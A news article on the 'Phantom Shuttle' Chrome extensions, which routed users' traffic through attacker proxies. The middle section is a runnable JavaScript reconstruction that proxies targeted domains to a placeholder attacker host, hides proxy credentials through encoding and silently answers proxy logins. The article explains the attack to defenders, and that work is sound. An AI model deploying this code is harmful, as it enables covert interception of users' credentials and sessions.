Malicious Chrome Extensions Steal User Data for Years Before Removal
WASHINGTON, D.C. — For nearly a decade, two malicious Chrome extensions known as “Phantom Shuttle” quietly siphoned sensitive user data by rerouting web traffic through attacker-controlled proxy servers, security researchers revealed. The extensions, which masqueraded as legitimate proxy and network speed testing tools, were available on Google’s official Chrome Web Store until their recent removal following exposure by cybersecurity experts.
Researchers at Socket discovered that both extensions, published under the same developer name, had been active since at least 2017. Marketed primarily to foreign trade workers needing to test internet connectivity across regions, the extensions were subscription-based, charging users between $1.40 and $13.60 for their services. At first glance, the tools appeared legitimate, with functional descriptions and reasonable pricing. However, their true purpose was far more insidious.
According to Socket's analysis, the extensions covertly rerouted browser traffic through proxy servers controlled by the attackers. The malicious code was concealed inside what looked like a standard copy of the jQuery library, and the proxy credentials were hardcoded in the extension but stored under a custom character-index encoding rather than as plaintext strings, so a simple search for credentials in the package would find nothing.
Once installed, Phantom Shuttle used Chrome's proxy API to apply a proxy auto-configuration (PAC) script, so that requests to the targeted hosts were routed through the attackers' infrastructure. It also registered a webRequest listener for HTTP authentication challenges and answered the proxy's challenge with the embedded credentials, so the proxy login never prompted the user. With traffic terminating at servers the attackers control, the operators were positioned to read, log or modify it, and the researchers say the proxy network could capture usernames, passwords, credit card details, session cookies, and other personal information submitted through web forms. A practical caveat: a proxy sees plaintext HTTP in full, but for HTTPS it sees destination hostnames and connection metadata and can only read page contents if the browser has been made to trust an interception certificate. The PAC script targeted over 170 high-value domains, including developer platforms, cloud service dashboards, social media sites, and adult content portals, while sending local and private-network addresses and the attackers' own command-and-control domains directly rather than through the proxy, which keeps the extension's own backend traffic out of the proxy and avoids drawing attention.
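The mechanics described above, as an added illustration that is not Phantom Shuttle's code and not Socket's: a PAC script that proxies a chosen list of domains and bypasses local networks and the operator's backend, credentials stored as character indices (a hypothetical stand-in for the real scheme), and the onAuthRequired listener that answers the proxy's challenge. All hostnames, ports, credentials and the alphabet are invented placeholders; the PAC helpers are re-implemented only so the script can be evaluated outside Chrome.

```javascript
// Added example (not the extension's or Socket's code). Hostnames, ports, credentials and
// the alphabet below are invented placeholders.

const PROXY_HOST = "proxy.example.invalid";
const PROXY_PORT = 8080;
const C2_HOST = "update.example.invalid";   // operator backend, deliberately never proxied
const TARGET_DOMAINS = ["github.com", "console.aws.amazon.com", "twitter.com"]; // stand-in for the 170+

// Hypothetical "character index" obfuscation: the secret is stored as indices into an
// alphabet, so a plaintext grep for the credential finds nothing. The real scheme differs.
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_-";
function decodeIndices(indices) {
  return indices.map((i) => ALPHABET[i]).join("");
}
const PROXY_USER = decodeIndices([20, 18, 4, 17, 36, 27, 0]);  // decodes to "user_1a"
const PROXY_PASS = decodeIndices([15, 0, 18, 18, 37, 27, 35]); // decodes to "pass-19"

// The PAC text Chrome's PAC engine evaluates. isPlainHostName, dnsDomainIs and isInNet
// are built into that engine; everything else must be in the script itself.
const PAC_SOURCE = `
function FindProxyForURL(url, host) {
  host = host.toLowerCase();
  if (isPlainHostName(host) || host === "localhost" || dnsDomainIs(host, "${C2_HOST}")) {
    return "DIRECT";
  }
  if (/^\\d{1,3}(\\.\\d{1,3}){3}$/.test(host) &&
      (isInNet(host, "10.0.0.0", "255.0.0.0") || isInNet(host, "172.16.0.0", "255.240.0.0") ||
       isInNet(host, "192.168.0.0", "255.255.0.0") || isInNet(host, "127.0.0.0", "255.0.0.0"))) {
    return "DIRECT";
  }
  var targets = ${JSON.stringify(TARGET_DOMAINS)};
  for (var i = 0; i < targets.length; i++) {
    if (dnsDomainIs(host, targets[i])) return "PROXY ${PROXY_HOST}:${PROXY_PORT}";
  }
  return "DIRECT";
}`;

// Minimal stand-ins for Chrome's PAC helpers so the script can be evaluated offline.
function isPlainHostName(host) { return host.indexOf(".") === -1; }
function dnsDomainIs(host, domain) { return host === domain || host.endsWith("." + domain); }
function isInNet(ip, net, mask) {
  const toInt = (s) => s.split(".").reduce((acc, o) => (acc << 8) + Number(o), 0) >>> 0;
  return ((toInt(ip) & toInt(mask)) >>> 0) === ((toInt(net) & toInt(mask)) >>> 0);
}

// Evaluate the PAC text the same way Chrome would, with the helpers in scope.
function loadPac(source) {
  return new Function("isPlainHostName", "dnsDomainIs", "isInNet",
    source + "\nreturn FindProxyForURL;")(isPlainHostName, dnsDomainIs, isInNet);
}

// The chrome.proxy value the extension applies; "pac_script" mode makes every request
// consult FindProxyForURL.
function buildProxyConfig() {
  return { mode: "pac_script", pacScript: { data: PAC_SOURCE } };
}

// webRequest.onAuthRequired listener: answer only the attacker proxy's own challenge
// (isProxy is true and the challenger matches); any other challenge is left to the
// browser's normal prompt so nothing looks odd to the user.
function onAuthRequired(details) {
  const c = details.challenger || {};
  if (details.isProxy && c.host === PROXY_HOST && c.port === PROXY_PORT) {
    return { authCredentials: { username: PROXY_USER, password: PROXY_PASS } };
  }
  return {};
}

// Wiring as a background script would do it. Needs the "proxy" and "webRequest"
// permissions and, in Manifest V3, "webRequestAuthProvider". Skipped outside Chrome.
if (typeof chrome !== "undefined" && chrome.proxy && chrome.webRequest) {
  chrome.proxy.settings.set({ value: buildProxyConfig(), scope: "regular" });
  chrome.webRequest.onAuthRequired.addListener(onAuthRequired, { urls: ["<all_urls>"] }, ["blocking"]);
}

// Offline demonstration of the routing decisions.
const pac = loadPac(PAC_SOURCE);
console.log(pac("https://github.com/login", "github.com"));                    // PROXY proxy.example.invalid:8080
console.log(pac("http://192.168.1.10/", "192.168.1.10"));                      // DIRECT
console.log(pac("https://update.example.invalid/", "update.example.invalid")); // DIRECT
```

The practical check this suggests for defenders: an extension that can do this must request the "proxy" permission (and "webRequest" plus, under Manifest V3, "webRequestAuthProvider") in its manifest, so those permissions on an extension that only claims to test connection speed deserve a closer look, and the PAC text, whether packaged or fetched at runtime, shows exactly which destinations are being sent through whose servers.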
Google responded by removing the extensions from the Chrome Web Store after researchers publicly disclosed the threat. The company’s security team emphasized its commitment to protecting users from malicious software and urged users to review their installed extensions regularly. This incident highlights the ongoing challenges faced by browser extension marketplaces in vetting and monitoring third-party tools.
The Federal Bureau of Investigation has previously warned about the risks posed by malicious browser extensions, which can act as silent spies by hijacking traffic and stealing data without users' knowledge. Experts recommend that users only install extensions from trusted sources, keep software updated, and employ multifactor authentication to limit the damage from stolen passwords. One caveat applies to this case: multifactor authentication does not protect a session cookie captured after login, so anyone who had these extensions installed should remove them, confirm that Chrome's proxy settings are no longer under extension control, and sign out of and re-authenticate to the affected services rather than rely on a password change alone.
For more information on protecting against browser-based threats, the United States Computer Emergency Readiness Team (US-CERT, now part of CISA) offers guidance on safe extension use and identifying suspicious activity. This case is a stark reminder of the risks lurking in seemingly harmless software and of the importance of vigilance in digital security.